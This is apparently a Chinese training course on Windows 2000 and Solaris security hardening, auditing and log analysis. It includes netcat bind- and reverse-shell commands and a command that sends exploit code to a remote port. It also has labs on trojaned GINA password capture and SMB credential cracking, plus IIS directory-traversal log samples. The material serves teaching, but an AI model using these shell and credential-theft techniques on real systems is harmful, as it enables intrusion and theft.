操作系統(tǒng)安全技術(shù)

課程目的了解win2K系統(tǒng)的設(shè)計原理了解Win2K的安全特性能夠?qū)in2K系統(tǒng)進(jìn)行安全配置授課方式：講解、演示、學(xué)員實際操作中國科學(xué)院計算技術(shù)研究所教育中心趙鳳偉制作了解日常選擇的安裝分區(qū)是什么？是否關(guān)默認(rèn)服務(wù)是否采用默認(rèn)安裝對win2K是否配置過本地安全策略為什么要介紹windowsNT安全WindowsNT體系構(gòu)架WindowsNT安全基礎(chǔ)WindowsNT日常安全配置WindowsNT的審計分析為什么要介紹windowsNT的安全系統(tǒng)安全評測標(biāo)準(zhǔn)系統(tǒng)面臨很多威脅黑客攻擊手段系統(tǒng)漏洞導(dǎo)致的損失系統(tǒng)安全評測標(biāo)準(zhǔn)1985年，美國國防部公布《可信計算機(jī)系統(tǒng)評估準(zhǔn)則》（TCSEC）即桔皮書

TCSEC安全等級

安全級別描述D最低的級別。如MS-DOS計算機(jī)，沒有安全性可言C1靈活的安全保護(hù)。系統(tǒng)不需要區(qū)分用戶?？商峁└镜脑L問控制。C2靈活的訪問安全性。系統(tǒng)不僅要識別用戶還要考慮唯一性。系統(tǒng)級的保護(hù)主要存在于資源、數(shù)據(jù)、文件和操作上。NT屬于C2級的系統(tǒng)B1標(biāo)記安全保護(hù)。系統(tǒng)提供更多的保護(hù)措施包括各式的安全級別。如AT＆T的SYSTEMV和UNIXwithMLS以及IBMMVS/ESAB2結(jié)構(gòu)化保護(hù)。支持硬件保護(hù)。內(nèi)容區(qū)被虛擬分割并嚴(yán)格保護(hù)。如TrustedXENIXandHoneywellMULTICSB3安全域。提出數(shù)據(jù)隱藏和分層，阻止層之間的交互。如HoneywellXTS-200A校驗級設(shè)計。需要嚴(yán)格的準(zhǔn)確的證明系統(tǒng)不會被危害，而且提供所有低級別的因素。如HoneywellSCOMP基于C2級標(biāo)準(zhǔn)的安全組件 靈活的訪問控制WindowsNT支持C2級標(biāo)準(zhǔn)要求的靈活訪問控制。要求包括允許對象的屬主能夠完全控制誰可以訪問這個對象及什么樣的訪問權(quán)限。 對象再利用WindowsNT很明確地阻止所有的應(yīng)用程序不可訪問被另一應(yīng)用程序使用所占用資源內(nèi)的信息（比如內(nèi)存或磁盤）。這種安全面貌是NT沒有能力恢復(fù)已在磁盤上刪除的文件的主要原因。 強(qiáng)制登陸與WindowsforWorkgroups、Windows95和98不同，WindowsNT用戶在能訪問任何資源前必須通過登陸來驗證他們的身份。這也是另一個原因缺乏這種強(qiáng)制登陸的NT要想達(dá)到以前的C2級的標(biāo)準(zhǔn)就必須禁止網(wǎng)絡(luò)功能。 審計因為WindowsNT采用單獨(dú)地機(jī)制來控制對任何資源的訪問，所以這種機(jī)制可以集中地記錄下所有的訪問活動。 控制對象的訪問WindowsNT不允許直接訪問系統(tǒng)里的資源，這種不許直接訪問是允許訪問控制的關(guān)鍵。在允許訪問之前，用戶或應(yīng)用程序的權(quán)限首先被驗證被攻擊的前幾種操作系統(tǒng)MicrosoftWindows31663000UNIX22544605CISCOIOS7821832被攻擊最多的通用WEB服務(wù)器被攻擊的產(chǎn)品占有用戶的百分比被攻擊的次數(shù)MicrosoftIIS41.0617797201ApacheGroupApache10.6212602NetscapeEnterpriseServer9.074892IplanetE-commerceSolution0.13124造成的損失2003-8-15全球受沖擊波里蠕蟲感染的機(jī)器超過34萬臺。8月1日下午微軟公司網(wǎng)站被黑，一個多小時無法訪問。為什么要介紹windowsNT安全WindowsNT體系統(tǒng)構(gòu)架WindowsNT安全基礎(chǔ)WindowsNT安全日常配置WindowsNT的審計分析WindowsNT體系統(tǒng)構(gòu)架服務(wù)管理器服務(wù)進(jìn)程系統(tǒng)支持進(jìn)程本地安全驗證服務(wù)Windows登錄會話管理器應(yīng)用程序環(huán)境子系統(tǒng)Svchost.exeWinmgmt.exeSpoolerServices.exe任務(wù)管理器Windows瀏覽器用戶級應(yīng)用程序子系統(tǒng)動態(tài)鏈接庫OS/2POSIXWin32系統(tǒng)服務(wù)調(diào)度進(jìn)程核心可調(diào)用接口I/O設(shè)備管理器設(shè)備、文件驅(qū)動程序文件系統(tǒng)緩存管理器即插即用設(shè)備管理器虛擬內(nèi)存管理器進(jìn)程和線程注冊表配置管理器NTdll.dllWin32UserGDI圖形驅(qū)動HALMicrokernel為什么要介紹windowsNT安全WindowsNT體系構(gòu)架WindowsNT安全基礎(chǔ)WindowsNT安全日常配置WindowsNT的審計分析windowsNT安全模型LogonprocessSAMUserAccountDatabaseSecurityPolicyDatabaseLSAAuditlogWin32applicationWin32subsystemSecurityReferenceMonitorUsermodeKernelmodeSecuritypolicyAuditmessageWindowsNT安全子系統(tǒng)WinlogonGINALocalSecurityAuthority(LSA)AuthenticationPackagesSecuritySupportProvidersSecurityAccountManagerNetlogonSSPI安全的要素安全帳戶管理器安全標(biāo)識符SID標(biāo)識了用戶、組和計算機(jī)的唯一性，不僅僅是在某臺特定的電腦上還包括和其它計算機(jī)交互的時候。為了確保SID的唯一性，它們是綜合計算機(jī)名字、當(dāng)前時間、以及處理當(dāng)前用戶模式線程所花費(fèi)CPU的時間所建立起來的。S-1-5-16349933112989372637-500安全訪問令牌安全描述符訪問控制列表進(jìn)程地址空間系統(tǒng)地址空間線程線程線程進(jìn)程和線程什么是進(jìn)程？代表了運(yùn)行程序的一個實例每一個進(jìn)程有一個私有的內(nèi)存地址空間什么是線程？進(jìn)程內(nèi)的一個執(zhí)行上下文進(jìn)程內(nèi)的所有線程共享相同的進(jìn)程地址空間每一個進(jìn)程啟動時帶有一個線程運(yùn)行程序的“主”函數(shù)可以在同一個進(jìn)程中創(chuàng)建其他的線程可以創(chuàng)建額外的進(jìn)程系統(tǒng)進(jìn)程基本的系統(tǒng)進(jìn)程smss.exeSessionManagercsrss.exe

子系統(tǒng)服務(wù)器進(jìn)程winlogon.exe

管理用戶登錄services.exe

包含很多系統(tǒng)服務(wù)lsass.exe

管理IP安全策略以及啟動ISAKMP/Oakley(IKE)和IP安全驅(qū)動程序。(系統(tǒng)服務(wù))產(chǎn)生會話密鑰以及授予用于交互式客戶/服務(wù)器驗證的服務(wù)憑據(jù)(ticket)。(系統(tǒng)服務(wù))svchost.exe

包含很多系統(tǒng)服務(wù)，檢查注冊表中的位置來構(gòu)建需要

加載的服務(wù)列表SPOOLSV.EXE將文件加載到內(nèi)存中以便遲后打印。(系統(tǒng)服務(wù))explorer.exe

資源管理器internat.exe

托盤區(qū)的拼音圖標(biāo)

系統(tǒng)進(jìn)程樹smss.exe

對話管理器

第一個創(chuàng)建的進(jìn)程

引入?yún)?shù)

HKLM\System\CurrentControlSet\Control\SessionManager

裝入所需的子系統(tǒng)(csrss)，然后winlogoncsrss.exe Win32子系統(tǒng)winlogon.exe

登錄進(jìn)程：裝入services.exe和lsass.exe

顯示登錄對話框（“鍵入CTRL+ALT+DEL，登錄）當(dāng)有人登入，運(yùn)行在HKLM\Software\Microsoft\WindowsNT\WinLogon\Userinit

中的進(jìn)程（通常只是userinit.exe)services.exe服務(wù)控制器：也是幾項服務(wù)的出發(fā)點Svchost.exe

服務(wù)的開始進(jìn)程不是services.exe的一部分

(由HKLM\System\CurrentControlSet\Services驅(qū)動)lsass.exe

本地安全驗證服務(wù)器（打開SAM）userinit.exe

登陸之后啟動。啟動外殼（通常是Explorer.exe—見

HKLM\Software\Microsoft\

WindowsNT\CurrentVersion\WinLogon\Shell)

裝入配置文件，恢復(fù)驅(qū)動器標(biāo)識符映象，然后退出（因此，瀏覽器單獨(dú)顯示）

explorer.exe

和它的孩子是所有交互式應(yīng)用的創(chuàng)建者

附加的系統(tǒng)進(jìn)程?mstask.exe

允許程序在指定時間運(yùn)行。(系統(tǒng)服務(wù))?regsvc.exe

regsvc.exe

允許遠(yuǎn)程注冊表操作。(系統(tǒng)服務(wù))?winmgmt.exe

提供系統(tǒng)管理信息(系統(tǒng)服務(wù))。?inetinfo.exe

通過Internet信息服務(wù)的管理單元提供信息服務(wù)連接和管理。(系統(tǒng)服務(wù))?tlntsvr.exe

允許遠(yuǎn)程用戶登錄到系統(tǒng)并且使用命令行運(yùn)行控制臺。(系統(tǒng)服務(wù))?termsrv.exe

提供多會話環(huán)境允許客戶端設(shè)備訪問虛擬的Windows2000Professional桌面會話以及運(yùn)行在服務(wù)器上的桌面會話基于Windows的程序。(系統(tǒng)服務(wù))?dns.exe

應(yīng)答對域名系統(tǒng)(DNS)名稱的查詢和更新請求。(系統(tǒng)服務(wù))試驗（一）用ntsd

結(jié)束正常無法結(jié)束的進(jìn)程N(yùn)tsd–cq–ppid試驗（二）使用listdlls

分析winlogon進(jìn)程模塊信息配置devel5插入winlogon

同時測試結(jié)果用listdlls

查看winlogon是否多了wshtcpip.dll用fc命令比較兩次不用輸出結(jié)果Unlocker

強(qiáng)制刪除木馬文件Ftype

修復(fù)系統(tǒng)關(guān)聯(lián)文件試驗（三）使用listdlls

分析winlogon進(jìn)程模塊信息植入msgina木馬用listdlls

查看winlogon的gina

是否正常查看被劫持的登陸密碼Ssdt

木馬分析Win32KernelRootkitsmodifythebehaviourofthesystembyKernelNativeAPIhooking.ThistechniqueistypicallyimplementedbymodifyingtheServiceTableentriesintheServiceDescriptorTable(SDT).Suchmodificationensuresthatareplacement(hook)functioninstalledbyarootkitiscalledpriortotheoriginalnativeAPI.ThereplacementfunctionusuallycallstheoriginalnativeAPIandmodifiestheoutputbeforereturningtheresultstotheuser-spaceprogram.Thistechniqueallowskernelrootkitstohidefiles,processes,andtopreventprocesstermination在user-space和systemservice之間是通過相應(yīng)的dllsexportapi實現(xiàn)的例1writedatatoanopenfile

由kernel32.dllwritefile

api

wirtefile

api在內(nèi)核層由zwwritefilenativeapithatisexportedbyntdll.dll

在內(nèi)核層通過中斷技術(shù)實現(xiàn)zwwritefile1-MOVEAX,0ED2-LEAEDX,DWORDPTRSS:[ESP+4]3-INT2E4-RETN24注：0EDistheservicenumberofthezwwritefile

ItwillbeusedtooffsetintotheServiceTable(SystemServiceDispatchTable)inkernel-spacetolocatetheaddressofthefunctionthatimplementsthewritefileservice

ServiceDescriptorTabletypedef

struct

ServiceDescriptorTable{ SDEServiceDescriptor[4];}SDT;typedef

struct

ServiceDescriptorEntry{PDWORDServiceTable;PDWORDCounterTableBase;DWORDServiceLimit;PBYTEArgumentTable;}SDE;ServiceTable

的值就是指向zwwritefile

whichcontainstheactualcodetowritetofilesProcessHidingbyHookingZwQuerySystemInformation

UseruseToolHelpAPIstoobtainalistofallrunningprocessesToolhepAPIcallZWQUERYSYSTEMINFORMATIONexportedbyntdll.dllinkernelmodeHackermodifythefunctionpointerinservicetable(ZWQUERYSYSTEMINFORMATION)toareplacementfunctionThereplacementfunctionfirstcallstheoriginalZwQuerySystemInformationAPItoobtainanarraycontaininginformationofallrunningprocess.Thereturnedarrayisthenmodifiedtoremovetheentrycontainingtheprocesstobehidden.Finally,themodifiedresultisreturnedtotheuser-spaceprogram.Thiseffectivelypreventstheuser-spaceprogramfrom"seeing"thehiddenprocess.sdtrestoreC:\>sdtrestoreSDTrestoreVersion0.1Proof-of-ConceptbySIG^2G-TEC(.sg)KeServiceDescriptorTable8046DFA0KeServiceDecriptorTable.ServiceTable804742B8KeServiceDescriptorTable.ServiceLimit248ZwAllocateVirtualMemory10--[hookedbyunknownatF754CE74]--ZwCreateFile20--[hookedbyunknownatF754CA85]--ZwCreateKey23--[hookedbyunknownatF754CC5E]--ZwCreateProcess29--[hookedbyunknownatF754CDB7]--ZwDeleteFile34--[hookedbyunknownatF754C80C]--ZwGetTickCount4C--[hookedbyunknownatF754CE27]--ZwLoadDriver55--[hookedbyunknownatF754CBF2]--ZwQueryDirectoryFile7D--[hookedbyunknownatF754C6E8]--ZwQuerySystemInformation97--[hookedbyunknownatF754C623]--ZwSetInformationFileC2--[hookedbyunknownatF754C8A8]--NumberofServiceTableentrieshooked=10WARNING:THISISEXPERIMENTALCODE.FIXINGTHESDTMAYHAVEGRAVECONSEQUENCES,SUCHASSYSTEMCRASH,DATALOSSORSYSTEMCORRUPTION.PROCEEDATYOUROWNRISK.YOUHAVEBEENWARNED.FixSDTEntries(Y/N)?:y[+]PatchedSDTentry10to804A257F[+]PatchedSDTentry20to80497EF9[+]PatchedSDTentry23to804B2483[+]PatchedSDTentry29to804A9212[+]PatchedSDTentry34to804D0584[+]PatchedSDTentry4Cto80463FF2[+]PatchedSDTentry55to8052DC72[+]PatchedSDTentry7Dto80498541[+]PatchedSDTentry97to80493B5B[+]PatchedSDTentryC2to80498C08試驗1iceswordtoviewsdt

2usesdtrestoretorestorethesdtWin2K服務(wù)基礎(chǔ)TCP/IP端口與服務(wù)NetBios協(xié)議RPC服務(wù)公共互連網(wǎng)絡(luò)文件系統(tǒng)（CIFS）練習(xí)：1、查看端口與服務(wù)對應(yīng)文件2、查看默認(rèn)開放端口TCP/IP端口與服務(wù)nc-nvv192.168.x.x80連到192.168.x.x的TCP80端口nc-l-p80監(jiān)聽本機(jī)的TCP80端口nc-l-p5354-t-ec:\winnt\system32\cmd.exe遠(yuǎn)程主機(jī)端口與shell的綁定nc-t-ec:\winnt\system32\cmd.exe192.168.x.x5354綁定REMOTE主機(jī)的CMDSHELL并反向連接到192.168.x.x的TCP5354端口nc-nvv192.168.x.x80<c:\exploit.txt輸送溢出代碼到遠(yuǎn)程主機(jī)的80端口Smb與CifsSMB一種客戶機(jī)/服務(wù)器、請求/響應(yīng)協(xié)議。通過SMB協(xié)議，客戶端應(yīng)用程序可以在各種網(wǎng)絡(luò)環(huán)境下讀、寫服務(wù)器上的文件，以及對服務(wù)器程序提出服務(wù)請求。此外通過SMB協(xié)議，應(yīng)用程序可以訪問遠(yuǎn)程服務(wù)器端的文件、以及打印機(jī)、郵件槽（mailslot）、命名管道（namedpipe）等資源Smb協(xié)議MicrosoftnetworkLanmanagerNtlmNtlmv2試驗1通過網(wǎng)上鄰居共享訪問一個主機(jī)用cain截獲smb通訊Sendtocracker.破解用戶名與密碼試驗2用redbutton測試smb通訊的安全性Keylogger

木馬為什么要介紹windowsNT安全WindowsNT體系構(gòu)架WindowsNT安全基礎(chǔ)WindowsNT日常安全配置WindowsNT的審計分析Win2K服務(wù)win2K日常安全配置基本安裝配置要點帳號和口令安全管理文件夾訪問控制權(quán)限本地安全策略注冊表中的安全配置其它安全配置日常異常檢測和日常維護(hù)帳號和口令安全SAMSyskey帳號和口令策略帳號和口令策略***在賬戶策略->密碼策略中設(shè)定：

密碼復(fù)雜性要求啟用

密碼長度最小值個人機(jī)8位，服務(wù)器10位以上

強(qiáng)制密碼歷史5次

最長存留期30天

***在賬戶策略->賬戶鎖定策略中設(shè)定：

賬戶鎖定3次錯誤登錄

鎖定時間20分鐘

復(fù)位鎖定計數(shù)20分鐘

練習(xí)帳號和口令安全更改超級管理帳戶名稱取消guest帳號禁止某些帳號從本地或遠(yuǎn)程登錄新建一名為administrator的普通帳號為用戶合理地分配權(quán)限練習(xí)用戶權(quán)限Administrators組Users組PowerUsers組BackupOperators組win2K日常安全配置基本安裝配置要點帳號和口令安全管理文件夾訪問控制權(quán)限本地安全策略注冊表中的安全配置其它安全配置日常異常檢測和日常維護(hù)文件系統(tǒng)安全Windows2000支持NTFS文件系統(tǒng)、文件分配表(FAT)和FAT32。NTFSFATFAT32運(yùn)行Windows2000的計算機(jī)可以訪問NTFS分區(qū)上的文件。運(yùn)行帶有ServicePack4或更高版本的WindowsNT4.0計算機(jī)可能可以訪問某些文件。其他操作系統(tǒng)則無法訪問。可以通過MS-DOS、所有版本的Windows、WindowsNT、Windows2000和OS/2訪問。只能通過Windows95OSR2、Windows98和Windows2000訪問。NTFS與FAT分區(qū)權(quán)限FAT32NTFSNTFS分區(qū)特點特殊權(quán)限所有者控制繼承性移動/復(fù)制影響共享權(quán)限磁盤配額文件權(quán)限權(quán)限控制原則和特點1>權(quán)限是累計2>拒絕的權(quán)限要比允許的權(quán)限高3>文件權(quán)限比文件夾權(quán)限高4>利用用戶組來進(jìn)行權(quán)限控制5>權(quán)限的最小化原則win2K日常安全配置基本安裝配置要點帳號和口令安全管理文件夾訪問控制權(quán)限本地安全策略注冊表中的安全配置其它安全配置日常異常檢測和日常維護(hù)本地安全策略--本地策略審核策略：決定記錄在計算機(jī)（成功/失敗的嘗試）的安全日志上的安全事件。用戶權(quán)利分配：決定在計算機(jī)上有登錄/任務(wù)特權(quán)的用戶或組。安全選項：啟用或禁用計算機(jī)的安全設(shè)置，例如數(shù)據(jù)的數(shù)字信號、administrator和guest的帳號名、軟驅(qū)和光盤的訪問、驅(qū)動程序的安裝以及登錄提示。win2K日常安全配置基本安裝配置要點帳號和口令安全管理文件夾訪問控制權(quán)限本地安全策略注冊表中的安全配置其它安全配置日常異常檢測和日常維護(hù)Regedit與Regedt32的區(qū)別regeditregedt32使用較新的Windows9x/me用戶界面使用較早的windows3.1用戶界面可搜索：鍵名、值名、值內(nèi)容只能搜索鍵名可以搜索并編輯遠(yuǎn)程注冊表可以搜索并編輯遠(yuǎn)程注冊表在一個窗口中顯示整個注冊表對每一控制項顯示各自的窗口可以導(dǎo)出、導(dǎo)入文本文件可以導(dǎo)出但不能導(dǎo)入文本文件不能導(dǎo)出或?qū)攵M(jìn)制文件可以導(dǎo)出并導(dǎo)入二進(jìn)制文件不能提供“只讀”模式提供“只讀”模式，但不作為缺省形式不提供安全特性支持完整的WindowsNT/2000訪問控制和審計存放在winnt文件夾里存放在winnt\system32文件里只完全支持Windows9x/me注冊表數(shù)據(jù)類型（字符串、二進(jìn)制、DWORD）支持全部WindowsNT/2000注冊表數(shù)據(jù)類型/字符串、二進(jìn)制、DWORD、多字符串、可擴(kuò)展字符串、資源描述刪除默認(rèn)網(wǎng)絡(luò)共享服務(wù)器:Key:HKLM\SYSTEM\CurrentControlSet\Services\lanmanserver\parametersName:AutoShareServerType:DWORDValue:0工作站：Key:HKLM\SYSTEM\CurrentControlSet\Services\lanmanserver\parametersName:AutoShareWksType:DWORDValue:0練習(xí)1、去除默認(rèn)共享2、刪除IE啟動主頁3、刪除IE的主頁修改限制注冊表權(quán)限試驗1通過regedt32修改run的訪問權(quán)限2在run下添加或修改響應(yīng)鍵值，看看結(jié)果安全模版與分析工具默認(rèn)工作站(basicwk.inf)默認(rèn)服務(wù)器(basicsv.inf)默認(rèn)域控制器(basicdc.inf)兼容工作站或服務(wù)器(compatws.inf)安全工作站或服務(wù)器(securews.inf)高度安全工作站或服務(wù)器(hisecws.inf)專用域控制器(dedicadc.inf)安全域控制器(securedc.inf)高度安全域控制器(hisecdc.inf)

練習(xí)：做一個適合普通辦公用機(jī)的安全模版，將其導(dǎo)出。模板配置試驗通過mmc打開安全模板和安全配置分析修改一個模板如securews

另存為一新模板在安全配置與分析打開一數(shù)據(jù)庫，輸入名字，導(dǎo)入新建模板查看系統(tǒng)配置win2K日常安全配置基本安裝配置要點帳號和口令安全管理文件夾訪問控制權(quán)限本地安全策略注冊表中的安全配置其它安全配置日常異常檢測和日常維護(hù)其它安全配置組策略EFS加密文件系統(tǒng)IIS安全I(xiàn)E安全EFS加密文件系統(tǒng)特性：1、采用單一密鑰技術(shù)2、核心文件加密技術(shù)僅用于NTFS，使用戶在本地計算機(jī)上安全存儲數(shù)據(jù)3、加密用戶使用透明，其他用戶被拒4、不能加密壓縮的和系統(tǒng)文件，加密后不能被共享、能被刪除建議加密文件夾，不要加密單獨(dú)的文件EFS恢復(fù)代理故障恢復(fù)代理就是獲得授權(quán)解密由其他用戶加密的數(shù)據(jù)的管理員必須進(jìn)行數(shù)據(jù)恢復(fù)時，恢復(fù)代理可以從安全的存儲位置獲得數(shù)據(jù)恢復(fù)證書導(dǎo)入系統(tǒng)。默認(rèn)的超級管理員就是恢復(fù)代理使用條件：當(dāng)加密密鑰丟失練習(xí)：1、用一個名為test的普通用戶將文件aa.txt加密2、使用一個名為張三的在管理員組帳號打開3、使用系統(tǒng)默認(rèn)的超級管理員打開IIS的安全配置

安裝IIS注意事項

Web站點主目錄目錄安全性練習(xí)SSL安全機(jī)制

SSL（加密套接字協(xié)議層）位于HTTP層和TCP層之間，建立用戶與服務(wù)器之間的加密通信，確保所傳遞信息的安全性。使用SSL安全機(jī)制時，首先客戶端與服務(wù)器建立連接，服務(wù)器把它的數(shù)字證書與公共密鑰一并發(fā)送給客戶端，客戶端隨機(jī)生成會話密鑰，用從服務(wù)器得到的公共密鑰對會話密鑰進(jìn)行加密，并把會話密鑰在網(wǎng)絡(luò)上傳遞給服務(wù)器，而會話密鑰只有在服務(wù)器端用私人密鑰才能解密，這樣，客戶端和服務(wù)器端就建立了一個唯一的安全通道。安裝IIS注意事項選擇安裝組件INTERNET服務(wù)管理器INTERNET服務(wù)管理器（HTML）WORLDWIDEWEB服務(wù)器公用文件文檔文件傳輸（FTP）服務(wù)器避免安裝在主域控制器上刪除inetpub下的scripts目錄IIS工具ToolIISLockTool具有以下功能和特點：?幫助管理員設(shè)置

IIS安全性；?此工具可以在4IIS4和

IIS5上使用；?幫助管理員去掉對本網(wǎng)站不必要的一些服務(wù)，使

IIS在滿足本網(wǎng)站需求的情況下運(yùn)行最少的服務(wù)下載地址?http:///default.aspx?scid=kb;en-us;309508IE的安全設(shè)置常規(guī)安全內(nèi)容高級win2K日常安全配置基本安裝配置要點帳號和口令安全管理文件夾訪問控制權(quán)限本地安全策略注冊表中的安全配置其它安全配置日常異常檢測和日常維護(hù)日常異常檢測異常端口檢測異常進(jìn)程檢測異常啟動項檢測異常程序檢測練習(xí)：1、異常端口檢測2、檢測異常啟動程序和進(jìn)程MBSAMicrosoftBaselineSecurityAnalyzer從MBSA主頁下載MBSA：/technet/security/tools/mbsahome.mspx

部署SUShttp:///fwlink/?LinkId=6930

日常維護(hù)--備份和還原數(shù)據(jù)將文件備份到文件或磁帶備份“系統(tǒng)狀態(tài)”數(shù)據(jù)使用備份向?qū)浞菸募媱潅浞輰⑽募浞莸組icrosoftExchange為什么要介紹windowsNT安全WindowsNT體系構(gòu)架WindowsNT安全基礎(chǔ)WindowsNT日常安全配置WindowsNT的審計分析安全審核與日志

訪問文件夾的審核審核策略安全事件查看并分析審計成功：可以確定用戶或服務(wù)獲得訪問指定文件、打印機(jī)或其他對象的頻率審計失?。壕婺切┛赡馨l(fā)生的安全泄漏windowsNT日志系統(tǒng)日志

跟蹤各種各樣的系統(tǒng)事件，比如跟蹤系統(tǒng)啟動過程中的事件或者硬件和控制器的故障。

應(yīng)用程序日志

跟蹤應(yīng)用程序關(guān)聯(lián)的事件，比如應(yīng)用程序產(chǎn)生的象裝載DLL（動態(tài)鏈接庫）失敗的信息將出現(xiàn)在日志中。安全日志

跟蹤事件如登錄上網(wǎng)、下網(wǎng)、改變訪問權(quán)限以及系統(tǒng)啟動和關(guān)閉。注意：安全日志的默認(rèn)狀態(tài)是關(guān)閉的。日志Internet信息服務(wù)

FTP日志默認(rèn)位置：%systemroot%/system32logfiles/msftpsvc1默認(rèn)每天一個日志Internet信息服務(wù)WWW日志默認(rèn)位置：：%systemroot%/system32/logfiles/w3svc1，默認(rèn)每天一個日志FTP日志和WWW日志文件名通常為ex（年份）（月份）（日期），例如ex001023就是2000年10月23日產(chǎn)生的日志，用記事本就可直接打開Scheduler服務(wù)日志默認(rèn)位置：%systemroot%/schedlgu.txt日志分析FTP日志分析，如下例：#Software:MicrosoftInternetInformationServices5.0（微軟IIS5.0）#Version:1.0（版本1.0）#Date:2000102303:11:55（服務(wù)啟動時間日期）03:11:55[1]USERadministator-331（IP地址為

用戶名為administator

試圖登錄）03:11:58[1]PASS-530（登錄失敗）03:12:04[1]USERnt-331（

IP地址為

用戶名為

nt的用戶試圖登錄）03:12:06[1]PASS-530（登錄失?。?3:12:32[1]USERadministrator-331（（

IP地址為

用戶名為administrator試圖登錄）03:12:34[1]PASS230（登錄成功）（登錄成功）03:12:41[1]MKDnt550（新建目錄失敗）03:12:45[1]QUIT550（退出FTP程序）日志分析http日志#Software:MicrosoftInternetInformationServices5.0#Version:1.0#Date:2003-08-1105:30:32#Fields:datetimec-ip

cs-usernames-ips-portcs-methodcs-uri-stem

cs-uri-querysc-statuscs(User-Agent)2003-08-1105:30:3243-4380GET/scripts/..%5c..%5cwinnt/system32/cmd.exe/c+dir+c:\200Mozilla/4.0+(compatible;+MSIE+5.01;+Windows+NT+5.0)2003-08-1107:24:0143-4380GET/scripts/..%5c..%5cwinnt/system32/cmd.exe/c+copy%20c:\winnt\system32\cmd.exe%20venus.exe502Mozilla/4.0+(compatible;+MSIE+5.01;+Windows+NT+5.0)2003-08-2003:00:3543-4380GET/<Rejected-By-UrlScan>~/scripts/..%c1%af../winnt/system32/cmd.exe404-總結(jié)為什么要介紹windowsNT安全WindowsNT體系構(gòu)架WindowsNT安全基礎(chǔ)WindowsNT日常安全配置WindowsNT的審計分析課程目的掌握Solaris系統(tǒng)的安全配置掌握Solaris系統(tǒng)的異常分析及審計授課方式：講解、演示、學(xué)員上機(jī)操作

本課程操作、實驗環(huán)境：Solaris_9_x86Solaris系統(tǒng)安全Solaris系統(tǒng)安全配置Solaris系統(tǒng)審計分析Solaris系統(tǒng)安全配置Solaris系統(tǒng)基本安裝配置帳號和口令安全文件系統(tǒng)安全其它安全配置網(wǎng)絡(luò)服務(wù)安全異常檢測和維護(hù)Solaris系統(tǒng)安裝不安裝多余組件停止不必要的服務(wù)打最新的補(bǔ)丁設(shè)置aset關(guān)閉無用端口編輯/etc/inet/inetd.conf文件，注釋調(diào)無用的端口。（保留Telnet、Xwindows端口）參照/etc/inet/services文件中的端口。查看服務(wù)對應(yīng)的端口Solaris基本配置關(guān)閉無用端口/etc/rc3.dS34dhcp

S76snmpdx

S80mipagent

S15nfs.server

S50apache

S77dmi將大寫的S改為小寫xSolaris基本配置/etc/rc2.d

S70uucp

S71ldap.client

S72autoinstall

S73cachefs.daemon

S73nfs.client

S74autofs

S74xntpd

S80lp

S94Wnn6

將大寫的S改為小寫x如果想關(guān)閉Xwindows將S71rpc、S99dtlogin

改名Solaris基本配置Solaris補(bǔ)丁安裝Showrev

－p顯示安裝補(bǔ)丁版本信息Solaris補(bǔ)丁分類Point

Cluster

補(bǔ)丁下載地址：/pub-cgi/show.pl?target=patches/patch-access&nav=patchpageSolaris系統(tǒng)安全配置asetSecuritylevelstasksReportsAsetfilesConfigurationSecuritylevelsLowMediumhightasksSystemfilespermissionsverficationSystemfilescheckUser/groupcheckSystemconfigurationfilescheckEnvironmentcheckEepromcheckFirewallsetupReports/usr/aset/reports

/usr/aset/aset–n通過郵件把報表發(fā)送給其他人AsetfilesMasterfilesTunefilesUid_aliasesfilesChecklistfilesEnvironmentfilesConfigurationChoosewhichtaskstorunSpecifydirectoriesforchecklisttasksScheduleexecutionSolaris系統(tǒng)安全配置Solaris系統(tǒng)基本安裝配置帳號和口令安全文件系統(tǒng)安全其它安全配置網(wǎng)絡(luò)服務(wù)安全禁用和刪除不必要的帳號sys、uucp、nuucp、listen、lp、adm簡單的辦法是在/etc/shadow的password域前加NP。Passwd

－luser1刪除賬號#userdeluser1Solaris系統(tǒng)帳號安全練習(xí)8、9Solaris系統(tǒng)帳號安全強(qiáng)迫用戶修改密碼

passwd–fusername禁止用戶修改密碼

Passwd–n10–x7username設(shè)置用戶的期限Useradd–e12/25/99username

Solaris系統(tǒng)帳號安全創(chuàng)建var/adm/loginlog

記錄登陸過程設(shè)置chmod600/var/adm/loginlogChownsys/var/adm/loginlogRoot帳號安全性確保root只允許從控制臺登陸限制知道root口令的人數(shù)使用強(qiáng)壯的密碼三個月或者當(dāng)有人離開公司是就更改一次密碼使用普通用戶登陸,用su取得root權(quán)限,而不是以root身份登錄Solaris系統(tǒng)帳號安全Root帳號安全性設(shè)置umask

為077,在需要時再改回022請使用全路徑執(zhí)行命令不要允許有非root用戶可寫的目錄存在root的路徑里Solaris9系統(tǒng)默認(rèn)禁止root只能從console登陸Solaris系統(tǒng)帳號安全監(jiān)控用戶su過程在/etc/default/su里Uncomment

sulog=/var/adm/sulogconsole=/dev/console用的su過程可以在控制臺上顯示禁止root用戶遠(yuǎn)程登錄編輯/etc/default/login文件，添加 CONSOLE=/dev/null禁止root遠(yuǎn)程FTP登錄在/etc/ftpusers里加上root。在SSH

配置文件加：permitRootLogin

=

noSolaris系統(tǒng)帳號安全Solaris系統(tǒng)帳號安全記錄用戶未成功登陸系統(tǒng)的日志

/var/adm/loginlog?touch/var/adm/loginlog限制登陸shell/usr/lib/rsh

用戶被限制在自己的目錄下用戶只能使用PATH路徑下的命令不能使用重定向輸出符Solaris帳號口令安全設(shè)置密碼策略編輯“/etc/default/passwd”

修改MAXWEEKS=4

口令至少每隔4星期更改一次

修改MINWEEKS=1口令至多每隔1星期更改一次

添加WARNWEEKS=3修改口令后第三個星期會收到快要修改口令的信息

修改PASSLENGTH=6用戶口令長度不少于6個字符實驗4Solaris帳號口令安全設(shè)置sysadmin組口令刪除sysadmin組內(nèi)不重要用戶禁用User用戶練習(xí)Solaris系統(tǒng)安全配置Solaris系統(tǒng)基本安裝配置帳號和口令安全文件系統(tǒng)安全其它安全配置網(wǎng)絡(luò)服務(wù)安全ls–altestdrwxr-xr-x3rootroot1024Sep1311:58test模式位通常由一列10個字符來表示，每個字符表示一個模式設(shè)置1:表示文件類型。d表示目錄，-表示普通文件，l表示鏈接文件等等

每個文件和目錄有三組權(quán)限，一組是文件的擁有者、一組是文件所屬組的成員、一組是其他所有用戶。

"r"表示可讀，"w"表示可寫，"x"表示可執(zhí)行。一共9位(每組3位)，合起來稱為模式位(modebits)Solaris文件系統(tǒng)的安全Solaris文件系統(tǒng)的安全Chmod

